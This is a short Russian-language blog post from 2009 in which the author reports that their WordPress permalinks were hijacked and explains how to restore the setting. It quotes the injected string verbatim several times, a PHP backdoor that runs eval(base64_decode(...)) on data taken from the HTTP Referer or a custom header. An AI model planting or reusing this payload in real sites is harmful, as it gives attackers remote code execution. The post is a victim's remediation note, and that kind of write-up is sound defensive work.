Posts Tagged ‘hack’
Сегодня вордпресс сломали (eval base64_decode _SERVER[HTTP_REFERER]) (wp hack)
Пятница, сентября 4, 2009 20:47 11 CommentsИменно такая строчка:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
или такая:
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Приклеилась сегодня к моим ссылкам на полную новость.Эта проблема надлюбалась у многих блоггеров в основном западных.
Выглядело это так:
http://zeddy.ru/2009/08/27/ryadovye-budni-seoshnika/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
Вместо нормального:
http://zeddy.ru/2009/08/27/ryadovye-budni-seoshnika/
Гугля нашел уже 1700 сломанных блогов
Рассказываю как пофиксить , если у вас та же проблема
Идем в
Настройки->Постоянные ссылки (ЧПУ)
видим что кто то исправил вид чпу на вот такой:
/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
Исправляем назад, на это:
/%year%/%monthnum%/%day%/%postname%/
Да и не забываем удалить [...]
